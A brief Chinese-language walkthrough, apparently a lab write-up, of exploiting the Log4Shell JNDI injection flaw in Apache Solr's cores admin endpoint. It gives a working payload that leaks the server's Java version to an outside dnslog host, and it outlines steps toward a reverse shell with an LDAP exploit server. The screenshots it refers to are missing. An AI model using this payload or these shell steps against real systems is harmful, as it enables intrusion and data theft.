一.访问网址

发现 /solr/admin/cores?action=参数 可以上传 如下图

步骤二 在dnslog平台上来监控我们注入的效果

上传参数 solr/admin/cores?action=${jndi:ldap://${sys:java.version}.jxmxiy.dnslog.cn 获得java版本号

查看他的回显

开始准备反弹shell
下载JDNI,放到攻击机,输入如下命令

执行结果如下图

可以看到有三个服务,看到熟悉的rmi和ldap ,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入 另外开启监听

拿取JDK1.8的ldap直接访问


然后获取shell



















